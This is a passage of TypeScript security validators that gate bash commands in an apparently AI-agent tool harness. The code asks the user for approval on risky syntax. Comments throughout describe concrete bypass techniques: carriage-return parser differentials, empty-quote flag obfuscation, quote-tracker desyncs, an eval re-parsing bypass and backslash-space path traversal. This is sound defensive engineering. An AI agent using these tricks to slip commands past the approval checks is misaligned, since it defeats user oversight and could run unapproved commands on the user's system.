 * Flags quoted arguments that contain shell metacharacters.
 *
 * Three checks run against `context.unquotedContent`, each logged with its
 * own `subId`:
 *  1. a standalone quoted word containing `;` or `&`;
 *  2. a quoted `-name` / `-path` / `-iname` operand containing `;`, `|` or `&`;
 *  3. a quoted `-regex` operand containing `;` or `&` (`|` is not matched
 *     here — presumably because it is regex alternation).
 *
 * @param context Validation context; only `unquotedContent` is read.
 * @returns `ask` when any check matches, otherwise `passthrough`.
 */
function validateShellMetacharacters(
  context: ValidationContext,
): PermissionResult {
  const { unquotedContent } = context
  const message =
    'Command contains shell metacharacters (;, |, or &) in arguments'

  if (/(?:^|\s)["'][^"']*[;&][^"']*["'](?:\s|$)/.test(unquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
      subId: 1,
    })
    return { behavior: 'ask', message }
  }

  const globPatterns = [
    /-name\s+["'][^"']*[;|&][^"']*["']/,
    /-path\s+["'][^"']*[;|&][^"']*["']/,
    /-iname\s+["'][^"']*[;|&][^"']*["']/,
  ]

  if (globPatterns.some(p => p.test(unquotedContent))) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
      subId: 2,
    })
    return { behavior: 'ask', message }
  }

  if (/-regex\s+["'][^"']*[;&][^"']*["']/.test(unquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
      subId: 3,
    })
    return { behavior: 'ask', message }
  }

  return { behavior: 'passthrough', message: 'No metacharacters' }
}
|
|
|
|
/**
 * Flags `$NAME` variable references that sit directly next to a redirection
 * or pipe operator (`<`, `>`, `|`), on either side, with optional whitespace
 * in between.
 *
 * @param context Validation context; only `fullyUnquotedContent` is read.
 * @returns `ask` when such a reference is found, otherwise `passthrough`.
 */
function validateDangerousVariables(
  context: ValidationContext,
): PermissionResult {
  const { fullyUnquotedContent } = context

  if (
    // operator followed by a variable: `> $FILE`, `| $CMD`
    /[<>|]\s*\$[A-Za-z_]/.test(fullyUnquotedContent) ||
    // variable followed by an operator: `$CMD | ...`, `$FILE >`
    /\$[A-Za-z_][A-Za-z0-9_]*\s*[|<>]/.test(fullyUnquotedContent)
  ) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_VARIABLES,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains variables in dangerous contexts (redirections or pipes)',
    }
  }

  return { behavior: 'passthrough', message: 'No dangerous variables' }
}
|
|
|
|
/**
 * Flags command-substitution and related expansion syntax.
 *
 * Unescaped backticks are checked first via `hasUnescapedChar`; the remaining
 * constructs come from the `COMMAND_SUBSTITUTION_PATTERNS` table, and the
 * first matching entry determines the message.
 *
 * @param context Validation context; only `unquotedContent` is read.
 * @returns `ask` on the first match, otherwise `passthrough`.
 */
function validateDangerousPatterns(
  context: ValidationContext,
): PermissionResult {
  const { unquotedContent } = context

  // Special handling for backticks - check for UNESCAPED backticks only
  // Escaped backticks (e.g., \`) are safe and commonly used in SQL commands
  // NOTE(review): unlike every other branch, this one emits no logEvent.
  if (hasUnescapedChar(unquotedContent, '`')) {
    return {
      behavior: 'ask',
      message: 'Command contains backticks (`) for command substitution',
    }
  }

  // Other command substitution checks (include double-quoted content)
  for (const { pattern, message } of COMMAND_SUBSTITUTION_PATTERNS) {
    if (pattern.test(unquotedContent)) {
      logEvent('tengu_bash_security_check_triggered', {
        checkId:
          BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION,
        subId: 1,
      })
      return { behavior: 'ask', message: `Command contains ${message}` }
    }
  }

  return { behavior: 'passthrough', message: 'No dangerous patterns' }
}
|
|
|
|
/**
 * Flags any `<` or `>` left in the fully unquoted command text.
 *
 * Input redirection is tested first, so a command containing both operators
 * reports the input-redirection message.
 *
 * @param context Validation context; only `fullyUnquotedContent` is read.
 * @returns `ask` when either operator is present, otherwise `passthrough`.
 */
function validateRedirections(context: ValidationContext): PermissionResult {
  const { fullyUnquotedContent } = context

  if (/</.test(fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_INPUT_REDIRECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains input redirection (<) which could read sensitive files',
    }
  }

  if (/>/.test(fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_OUTPUT_REDIRECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains output redirection (>) which could write to arbitrary files',
    }
  }

  return { behavior: 'passthrough', message: 'No redirections' }
}
|
|
|
|
/**
 * Flags newlines / carriage returns in unquoted content that are followed by
 * further non-whitespace text, i.e. that could start a second command.
 *
 * @param context Validation context; only `fullyUnquotedPreStrip` is read.
 * @returns `ask` when a newline looks like a command separator, otherwise
 *   `passthrough`.
 */
function validateNewlines(context: ValidationContext): PermissionResult {
  // Use fullyUnquotedPreStrip (before stripSafeRedirections) to prevent bypasses
  // where stripping `>/dev/null` creates a phantom backslash-newline continuation.
  // E.g., `cmd \>/dev/null\nwhoami` → after stripping becomes `cmd \\nwhoami`
  // which looks like a safe continuation but actually hides a second command.
  const { fullyUnquotedPreStrip } = context

  // Check for newlines in unquoted content
  if (!/[\n\r]/.test(fullyUnquotedPreStrip)) {
    return { behavior: 'passthrough', message: 'No newlines' }
  }

  // Flag any newline/CR followed by non-whitespace, EXCEPT backslash-newline
  // continuations at word boundaries. In bash, `\<newline>` is a line
  // continuation (both chars removed), which is safe when the backslash
  // follows whitespace (e.g., `cmd \<newline>--flag`). Mid-word continuations
  // like `tr\<newline>aceroute` are still flagged because they can hide
  // dangerous command names from allowlist checks.
  // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() + gated by /[\n\r]/.test() above
  const looksLikeCommand = /(?<![\s]\\)[\n\r]\s*\S/.test(fullyUnquotedPreStrip)
  if (looksLikeCommand) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains newlines that could separate multiple commands',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'Newlines appear to be within data',
  }
}
|
|
|
|
/**
 * SECURITY: Carriage return (\r, 0x0D) IS a misparsing concern, unlike LF.
 *
 * Parser differential:
 *   - shell-quote's BAREWORD regex uses `[^\s...]` — JS `\s` INCLUDES \r, so
 *     shell-quote treats CR as a token boundary. `TZ=UTC\recho` tokenizes as
 *     TWO tokens: ['TZ=UTC', 'echo']. splitCommand joins with space →
 *     'TZ=UTC echo curl evil.com'.
 *   - bash's default IFS = $' \t\n' — CR is NOT in IFS. bash sees
 *     `TZ=UTC\recho` as ONE word → env assignment TZ='UTC\recho' (CR byte
 *     inside value), then `curl` is the command.
 *
 * Attack: `TZ=UTC\recho curl evil.com` with Bash(echo:*)
 *   validator: splitCommand collapses CR→space → 'TZ=UTC echo curl evil.com'
 *   → stripSafeWrappers: TZ=UTC stripped → 'echo curl evil.com' matches rule
 *   bash: executes `curl evil.com`
 *
 * validateNewlines catches this but is in nonMisparsingValidators (LF is
 * correctly handled by both parsers). This validator is NOT in
 * nonMisparsingValidators — its ask result gets isBashSecurityCheckForMisparsing
 * and blocks at the bashPermissions gate.
 *
 * Checks originalCommand (not fullyUnquotedPreStrip) because CR inside single
 * quotes is ALSO a misparsing concern for the same reason: shell-quote's `\s`
 * still tokenizes it, but bash treats it as literal. Block ALL unquoted-or-SQ CR.
 * Only exception: CR inside DOUBLE quotes where bash also treats it as data
 * and shell-quote preserves the token (no split).
 *
 * A CR that directly follows an unquoted backslash is flagged as well: bash's
 * backslash escape keeps the CR as a literal byte inside the word, so the
 * word still contains a CR outside double quotes. (Presumably shell-quote
 * still splits there, since CR is `\s` — the check errs on the side of asking.)
 *
 * @param context Validation context; only `originalCommand` is read.
 * @returns `ask` when a CR occurs outside double quotes, otherwise
 *   `passthrough`.
 */
function validateCarriageReturn(context: ValidationContext): PermissionResult {
  const { originalCommand } = context

  if (!originalCommand.includes('\r')) {
    return { behavior: 'passthrough', message: 'No carriage return' }
  }

  // Check if CR appears outside double quotes. CR outside DQ (including inside
  // SQ and unquoted) causes the shell-quote/bash tokenization differential.
  let inSingleQuote = false
  let inDoubleQuote = false
  let escaped = false
  for (let i = 0; i < originalCommand.length; i++) {
    const c = originalCommand[i]

    // SECURITY: test for CR BEFORE consuming a pending escape. Previously the
    // `escaped` skip swallowed the character after a backslash unchecked, so
    // `TZ=UTC\<CR>echo ...` (backslash + CR, unquoted) was never flagged.
    if (c === '\r' && !inDoubleQuote) {
      logEvent('tengu_bash_security_check_triggered', {
        checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,
        subId: 2,
      })
      return {
        behavior: 'ask',
        message:
          'Command contains carriage return (\\r) which shell-quote and bash tokenize differently',
      }
    }

    if (escaped) {
      escaped = false
      continue
    }
    // Backslash is literal inside single quotes, an escape everywhere else.
    if (c === '\\' && !inSingleQuote) {
      escaped = true
      continue
    }
    if (c === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    }
    if (c === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }
  }

  return { behavior: 'passthrough', message: 'CR only inside double quotes' }
}
|
|
|
|
/**
 * Flags any reference to the `IFS` shell variable in the raw command text.
 *
 * @param context Validation context; only `originalCommand` is read.
 * @returns `ask` when `$IFS` or a `${...IFS...}` expansion is present,
 *   otherwise `passthrough`.
 */
function validateIFSInjection(context: ValidationContext): PermissionResult {
  const { originalCommand } = context

  // Detect any usage of IFS variable which could be used to bypass regex validation
  // Check for $IFS and ${...IFS...} patterns (including parameter expansions like ${IFS:0:1}, ${#IFS}, etc.)
  // Using ${[^}]*IFS to catch all parameter expansion variations with IFS
  if (/\$IFS|\$\{[^}]*IFS/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.IFS_INJECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains IFS variable usage which could bypass security validation',
    }
  }

  return { behavior: 'passthrough', message: 'No IFS injection detected' }
}
|
|
|
|
/**
 * Additional hardening against reading environment variables via the /proc
 * filesystem. Path validation typically blocks /proc access, but this provides
 * defense-in-depth. Environment files in /proc can expose sensitive data like
 * API keys and secrets.
 *
 * @param context Validation context; only `originalCommand` is read.
 * @returns `ask` when the command text contains a `/proc/.../environ` path,
 *   otherwise `passthrough`.
 */
function validateProcEnvironAccess(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context

  // Check for /proc paths that could expose environment variables
  // This catches patterns like:
  // - /proc/self/environ
  // - /proc/1/environ
  // - /proc/*/environ (with any PID)
  if (/\/proc\/.*\/environ/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.PROC_ENVIRON_ACCESS,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command accesses /proc/*/environ which could expose sensitive environment variables',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No /proc/environ access detected',
  }
}
|
|
|
|
/**
 * Detects commands with malformed tokens (unbalanced delimiters) combined with
 * command separators. This catches potential injection patterns where ambiguous
 * shell syntax could be exploited.
 *
 * Security: This check catches the eval bypass discovered in HackerOne review.
 * When shell-quote parses ambiguous patterns like `echo {"hi":"hi;evil"}`,
 * it may produce unbalanced tokens (e.g., `{hi:"hi`). Combined with command
 * separators, this can lead to unintended command execution via eval re-parsing.
 *
 * By forcing user approval for these patterns, we ensure the user sees exactly
 * what will be executed before approving.
 *
 * @param context Validation context; only `originalCommand` is read.
 * @returns `ask` when the parsed command has both a `;`, `&&` or `||`
 *   operator and malformed tokens; `passthrough` otherwise (including when
 *   parsing fails).
 */
function validateMalformedTokenInjection(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context

  const parseResult = tryParseShellCommand(originalCommand)
  if (!parseResult.success) {
    // Parse failed - this is handled elsewhere (bashToolHasPermission checks this)
    return {
      behavior: 'passthrough',
      message: 'Parse failed, handled elsewhere',
    }
  }

  const parsed = parseResult.tokens

  // Check for command separators (;, &&, ||)
  const hasCommandSeparator = parsed.some(
    entry =>
      typeof entry === 'object' &&
      entry !== null &&
      'op' in entry &&
      (entry.op === ';' || entry.op === '&&' || entry.op === '||'),
  )

  if (!hasCommandSeparator) {
    return { behavior: 'passthrough', message: 'No command separators' }
  }

  // Check for malformed tokens (unbalanced delimiters)
  if (hasMalformedTokens(originalCommand, parsed)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.MALFORMED_TOKEN_INJECTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains ambiguous syntax with command separators that could be misinterpreted',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No malformed token injection detected',
  }
}
|
|
|
|
/**
 * Detects shell-quoting tricks that hide a flag name from the regex-based
 * dangerous-flag checks (e.g. `"-"exec`, `$'-exec'`, `"""-f"`).
 *
 * The checks run in order and the first hit returns `ask`:
 *  1-4c. whole-command regexes for ANSI-C / locale quoting and empty-quote
 *        prefixes;
 *  then  a quote-aware scan of `originalCommand` that inspects (a) quoted
 *        words following whitespace and (b) unquoted flags that contain
 *        quote characters;
 *  last  two regexes over `fullyUnquotedContent`.
 *
 * @param context Validation context; reads `originalCommand`, `baseCommand`
 *   and `fullyUnquotedContent`.
 * @returns `ask` when an obfuscation pattern is found, otherwise
 *   `passthrough`.
 */
function validateObfuscatedFlags(context: ValidationContext): PermissionResult {
  // Block shell quoting bypass patterns used to circumvent negative lookaheads we use in our regexes to block known dangerous flags

  const { originalCommand, baseCommand } = context

  // Echo is safe for obfuscated flags, BUT only for simple echo commands.
  // For compound commands (with |, &, ;), we need to check the whole command
  // because the dangerous ANSI-C quoting might be after the operator.
  const hasShellOperators = /[|&;]/.test(originalCommand)
  if (baseCommand === 'echo' && !hasShellOperators) {
    return {
      behavior: 'passthrough',
      message: 'echo command is safe and has no dangerous flags',
    }
  }

  // COMPREHENSIVE OBFUSCATION DETECTION
  // These checks catch various ways to hide flags using shell quoting

  // 1. Block ANSI-C quoting ($'...') - can encode any character via escape sequences
  // Simple pattern that matches $'...' anywhere. This correctly handles:
  // - grep '$' file => no match ($ is regex anchor inside quotes, no $'...' structure)
  // - 'test'$'-exec' => match (quote concatenation with ANSI-C)
  // - Zero-width space and other invisible chars => match
  // The pattern requires $' followed by content (can be empty) followed by closing '
  if (/\$'[^']*'/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 5,
    })
    return {
      behavior: 'ask',
      message: 'Command contains ANSI-C quoting which can hide characters',
    }
  }

  // 2. Block locale quoting ($"...") - can also use escape sequences
  // Same simple pattern as ANSI-C quoting above
  if (/\$"[^"]*"/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 6,
    })
    return {
      behavior: 'ask',
      message: 'Command contains locale quoting which can hide characters',
    }
  }

  // 3. Block empty ANSI-C or locale quotes followed by dash
  // $''-exec or $""-exec
  if (/\$['"]{2}\s*-/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 9,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains empty special quotes before dash (potential bypass)',
    }
  }

  // 4. Block ANY sequence of empty quotes followed by dash
  // This catches: ''- ""- ''""- ""''- ''""''- etc.
  // The pattern looks for one or more empty quote pairs followed by optional whitespace and dash
  if (/(?:^|\s)(?:''|"")+\s*-/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 7,
    })
    return {
      behavior: 'ask',
      message: 'Command contains empty quotes before dash (potential bypass)',
    }
  }

  // 4b. SECURITY: Block homogeneous empty quote pair(s) immediately adjacent
  // to a quoted dash. Patterns like `"""-f"` (empty `""` + quoted `"-f"`)
  // concatenate in bash to `-f` but slip past all the above checks:
  //   - Regex (4) above: `(?:''|"")+\s*-` matches `""` pair, then expects
  //     optional space and dash — but finds a third `"` instead. No match.
  //   - Quote-content scanner (below): Sees the first `""` pair with empty
  //     content (doesn't start with dash). The third `"` opens a new quoted
  //     region handled by the main quote-state tracker.
  //   - Quote-state tracker: `""` toggles inDoubleQuote on/off; third `"`
  //     opens it again. The `-` inside `"-f"` is INSIDE quotes → skipped.
  //   - Flag scanner: Looks for `\s` before `-`. The `-` is preceded by `"`.
  //   - fullyUnquotedContent: Both `""` and `"-f"` get stripped.
  //
  // In bash, `"""-f"` = empty string + string "-f" = `-f`. This bypass works
  // for ANY dangerous-flag check (jq -f, find -exec, fc -e) with a matching
  // prefix permission (Bash(jq:*), Bash(find:*)).
  //
  // The regex `(?:""|'')+['"]-` matches:
  //   - One or more HOMOGENEOUS empty pairs (`""` or `''`) — the concatenation
  //     point where bash joins the empty string to the flag.
  //   - Immediately followed by ANY quote char — opens the flag-quoted region.
  //   - Immediately followed by `-` — the obfuscated flag.
  //
  // POSITION-AGNOSTIC: We do NOT require word-start (`(?:^|\s)`) because
  // prefixes like `$x"""-f"` (unset/empty variable) concatenate the same way.
  // The homogeneous-empty-pair requirement filters out the `'"'"'` idiom
  // (no homogeneous empty pair — it's close, double-quoted-content, open).
  //
  // FALSE POSITIVE: Matches `echo '"""-f" text'` (pattern inside single-quoted
  // string). Extremely rare (requires echoing the literal attack). Acceptable.
  if (/(?:""|'')+['"]-/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 10,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains empty quote pair adjacent to quoted dash (potential flag obfuscation)',
    }
  }

  // 4c. SECURITY: Also block 3+ consecutive quotes at word start even without
  // an immediate dash. Broader safety net for multi-quote obfuscation patterns
  // not enumerated above (e.g., `"""x"-f` where content between quotes shifts
  // the dash position). Legitimate commands never need `"""x"` when `"x"` works.
  if (/(?:^|\s)['"]{3,}/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 11,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains consecutive quote characters at word start (potential obfuscation)',
    }
  }

  // Characters that can continue a flag after a closing quote. This catches:
  //   a-zA-Z0-9: "-"exec → -exec (direct concatenation)
  //   \\: "-"\exec → -exec (backslash escape is stripped)
  //   -: "-"-output → --output (extra dashes)
  //   {: "-"{exec,delete} → -exec -delete (brace expansion)
  //   $: "-"$VAR → -exec when VAR=exec (variable expansion)
  //   `: "-"`echo exec` → -exec (command substitution)
  // Note: glob chars (*?[) are omitted — they require attacker-controlled
  // filenames in CWD to exploit, and blocking them would break patterns
  // like `ls -- "-"*` for listing files that start with dash.
  // (Loop-invariant, so built once here rather than per iteration.)
  const FLAG_CONTINUATION_CHARS = /[a-zA-Z0-9\\${`-]/

  // Track quote state to avoid false positives for flags inside quoted strings
  let inSingleQuote = false
  let inDoubleQuote = false
  let escaped = false

  for (let i = 0; i < originalCommand.length - 1; i++) {
    const currentChar = originalCommand[i]
    const nextChar = originalCommand[i + 1]

    // Update quote state
    if (escaped) {
      escaped = false
      continue
    }

    // SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,
    // `\` inside `'...'` is LITERAL. Without this guard, `'\'` desyncs the
    // quote tracker: `\` sets escaped=true, closing `'` is consumed by the
    // escaped-skip above instead of toggling inSingleQuote. Parser stays in
    // single-quote mode, and the `if (inSingleQuote || inDoubleQuote) continue`
    // below skips ALL subsequent flag detection for the rest of the
    // command. Example: `jq '\' "-f" evil` — bash gets `-f` arg, but desynced
    // parser thinks ` "-f" evil` is inside quotes → flag detection bypassed.
    // Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns
    // before this runs. But we fix the tracker for consistency with
    // the CORRECT implementations elsewhere in this file (hasBackslashEscaped*,
    // extractQuotedContent) which all guard with `!inSingleQuote`.
    if (currentChar === '\\' && !inSingleQuote) {
      escaped = true
      continue
    }

    if (currentChar === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    }

    if (currentChar === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }

    // Only look for flags when not inside quoted strings
    // This prevents false positives like: make test TEST="file.py -v"
    if (inSingleQuote || inDoubleQuote) {
      continue
    }

    // Look for whitespace followed by quote that contains a dash (potential flag obfuscation)
    // SECURITY: Block ANY quoted content starting with dash - err on side of safety
    // Catches: "-"exec, "-file", "--flag", '-'output, etc.
    // Users can approve manually if legitimate (e.g., find . -name "-file")
    if (
      currentChar &&
      nextChar &&
      /\s/.test(currentChar) &&
      /['"`]/.test(nextChar)
    ) {
      const quoteChar = nextChar
      let j = i + 2 // Start after the opening quote
      let insideQuote = ''

      // Collect content inside the quote
      while (j < originalCommand.length && originalCommand[j] !== quoteChar) {
        insideQuote += originalCommand[j]!
        j++
      }

      // If we found a closing quote and the content looks like an obfuscated flag, block it.
      // Three attack patterns to catch:
      //   1. Flag name inside quotes: "--flag", "-exec", "-X" (dashes + letters inside)
      //   2. Split-quote flag: "-"exec, "--"output (dashes inside, letters continue after quote)
      //   3. Chained quotes: "-""exec" (dashes in first quote, second quote contains letters)
      // Pure-dash strings like "---" or "--" followed by whitespace/separator are separators,
      // not flags, and should not trigger this check.
      const charAfterQuote = originalCommand[j + 1]
      // Inside double quotes, $VAR and `cmd` expand at runtime, so "-$VAR" can
      // become -exec. Blocking $ and ` here over-blocks single-quoted literals
      // like grep '-$' (where $ is literal), but main's startsWith('-') already
      // blocked those — this restores status quo, not a new false positive.
      // Brace expansion ({) does NOT happen inside quotes, so { is not needed here.
      const hasFlagCharsInside = /^-+[a-zA-Z0-9$`]/.test(insideQuote)
      const hasFlagCharsContinuing =
        /^-+$/.test(insideQuote) &&
        charAfterQuote !== undefined &&
        FLAG_CONTINUATION_CHARS.test(charAfterQuote)
      // Handle adjacent quote chaining: "-""exec" or "-""-"exec or """-"exec concatenates
      // to -exec in shell. Follow the chain of adjacent quoted segments until
      // we find one containing an alphanumeric char or hit a non-quote boundary.
      // Also handles empty prefix quotes: """-"exec where "" is followed by "-"exec
      // The combined segments form a flag if they contain dash(es) followed by alphanumerics.
      const hasFlagCharsInNextQuote =
        // Trigger when: first segment is only dashes OR empty (could be prefix for flag)
        (insideQuote === '' || /^-+$/.test(insideQuote)) &&
        charAfterQuote !== undefined &&
        /['"`]/.test(charAfterQuote) &&
        (() => {
          let pos = j + 1 // Start at charAfterQuote (an opening quote)
          let combinedContent = insideQuote // Track what the shell will see
          while (
            pos < originalCommand.length &&
            /['"`]/.test(originalCommand[pos]!)
          ) {
            const segQuote = originalCommand[pos]!
            let end = pos + 1
            while (
              end < originalCommand.length &&
              originalCommand[end] !== segQuote
            ) {
              end++
            }
            const segment = originalCommand.slice(pos + 1, end)
            combinedContent += segment

            // Check if combined content so far forms a flag pattern.
            // Include $ and ` for in-quote expansion: "-""$VAR" → -exec
            if (/^-+[a-zA-Z0-9$`]/.test(combinedContent)) return true

            // If this segment has alphanumeric/expansion and we already have dashes,
            // it's a flag. Catches "-""$*" where segment='$*' has no alnum but
            // expands to positional params at runtime.
            // Guard against segment.length === 0: slice(0, -0) → slice(0, 0) → ''.
            const priorContent =
              segment.length > 0
                ? combinedContent.slice(0, -segment.length)
                : combinedContent
            if (/^-+$/.test(priorContent)) {
              if (/[a-zA-Z0-9$`]/.test(segment)) return true
            }

            if (end >= originalCommand.length) break // Unclosed quote
            pos = end + 1 // Move past closing quote to check next segment
          }
          // Also check the unquoted char at the end of the chain
          if (
            pos < originalCommand.length &&
            FLAG_CONTINUATION_CHARS.test(originalCommand[pos]!)
          ) {
            // If we have dashes in combined content, the trailing char completes a flag
            if (/^-+$/.test(combinedContent) || combinedContent === '') {
              // Check if we're about to form a flag with the following content
              const trailingChar = originalCommand[pos]!
              if (trailingChar === '-') {
                // More dashes, could still form a flag
                return true
              }
              if (
                /[a-zA-Z0-9\\${`]/.test(trailingChar) &&
                combinedContent !== ''
              ) {
                // We have dashes and now alphanumeric/expansion follows
                return true
              }
            }
            // Original check for dashes followed by alphanumeric
            if (/^-/.test(combinedContent)) {
              return true
            }
          }
          return false
        })()
      if (
        j < originalCommand.length &&
        originalCommand[j] === quoteChar &&
        (hasFlagCharsInside ||
          hasFlagCharsContinuing ||
          hasFlagCharsInNextQuote)
      ) {
        logEvent('tengu_bash_security_check_triggered', {
          checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
          subId: 4,
        })
        return {
          behavior: 'ask',
          message: 'Command contains quoted characters in flag names',
        }
      }
    }

    // Look for whitespace followed by dash - this starts a flag
    if (currentChar && nextChar && /\s/.test(currentChar) && nextChar === '-') {
      let j = i + 1 // Start at the dash
      let flagContent = ''

      // Collect flag content
      while (j < originalCommand.length) {
        const flagChar = originalCommand[j]
        if (!flagChar) break

        // End flag content once we hit whitespace or an equals sign
        if (/[\s=]/.test(flagChar)) {
          break
        }
        // End flag collection if we hit quote followed by non-flag character. This is needed to handle cases like -d"," which should be parsed as just -d
        if (/['"`]/.test(flagChar)) {
          // Special case for cut -d flag: the delimiter value can be quoted
          // Example: cut -d'"' should parse as flag name: -d, value: '"'
          // Note: We only apply this exception to cut -d specifically to avoid bypasses.
          // Without this restriction, a command like `find -e"xec"` could be parsed as
          // flag name: -e, bypassing our blocklist for -exec. By restricting to cut -d,
          // we allow the legitimate use case while preventing obfuscation attacks on other
          // commands where quoted flag values could hide dangerous flag names.
          if (baseCommand === 'cut' && flagContent === '-d') {
            // This is cut -d followed by a quoted delimiter - flagContent is already '-d'
            break
          }

          // Look ahead to see what follows the quote
          if (j + 1 < originalCommand.length) {
            const nextFlagChar = originalCommand[j + 1]
            if (nextFlagChar && !/[a-zA-Z0-9_'"-]/.test(nextFlagChar)) {
              // Quote followed by something that is clearly not part of a flag, end the parsing
              break
            }
          }
        }
        flagContent += flagChar
        j++
      }

      if (flagContent.includes('"') || flagContent.includes("'")) {
        logEvent('tengu_bash_security_check_triggered', {
          checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
          subId: 1,
        })
        return {
          behavior: 'ask',
          message: 'Command contains quoted characters in flag names',
        }
      }
    }
  }

  // Also handle flags that start with quotes: "--"output, '-'-output, etc.
  // Use fullyUnquotedContent to avoid false positives from legitimate quoted content like echo "---"
  if (/\s['"`]-/.test(context.fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 2,
    })
    return {
      behavior: 'ask',
      message: 'Command contains quoted characters in flag names',
    }
  }

  // Also handles cases like ""--output
  // Use fullyUnquotedContent to avoid false positives from legitimate quoted content
  if (/['"`]{2}-/.test(context.fullyUnquotedContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 3,
    })
    return {
      behavior: 'ask',
      message: 'Command contains quoted characters in flag names',
    }
  }

  return { behavior: 'passthrough', message: 'No obfuscated flags detected' }
}
|
|
|
|
/**
 * Detects backslash-escaped whitespace characters (space, tab) outside of quotes.
 *
 * In bash, `echo\ test` is a single token (command named "echo test"), but
 * shell-quote decodes the escape and produces `echo test` (two separate tokens).
 * This discrepancy allows path traversal attacks like:
 *   echo\ test/../../../usr/bin/touch /tmp/file
 * which the parser sees as `echo test/.../touch /tmp/file` (an echo command)
 * but bash resolves as `/usr/bin/touch /tmp/file` (via directory "echo test").
 *
 * @param command Raw command text to scan.
 * @returns `true` when a backslash directly followed by a space or tab occurs
 *   outside both single and double quotes.
 */
function hasBackslashEscapedWhitespace(command: string): boolean {
  let inSingleQuote = false
  let inDoubleQuote = false

  for (let i = 0; i < command.length; i++) {
    const char = command[i]

    // Backslash is handled before the quote toggles so that `\"` inside
    // double quotes is consumed as a pair and does not flip the quote state.
    if (char === '\\' && !inSingleQuote) {
      if (!inDoubleQuote) {
        const nextChar = command[i + 1]
        if (nextChar === ' ' || nextChar === '\t') {
          return true
        }
      }
      // Skip the escaped character (both outside quotes and inside double quotes,
      // where \\, \", \$, \` are valid escape sequences)
      i++
      continue
    }

    if (char === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }

    if (char === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    }
  }

  return false
}
|
|
|
|
/**
 * Validator wrapper around `hasBackslashEscapedWhitespace`.
 *
 * @param context Validation context; only `originalCommand` is read.
 * @returns `ask` when the command contains a backslash-escaped space or tab
 *   outside quotes, otherwise `passthrough`.
 */
function validateBackslashEscapedWhitespace(
  context: ValidationContext,
): PermissionResult {
  if (hasBackslashEscapedWhitespace(context.originalCommand)) {
    // NOTE(review): no subId is sent here, unlike the sibling validators.
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_WHITESPACE,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains backslash-escaped whitespace that could alter command parsing',
    }
  }
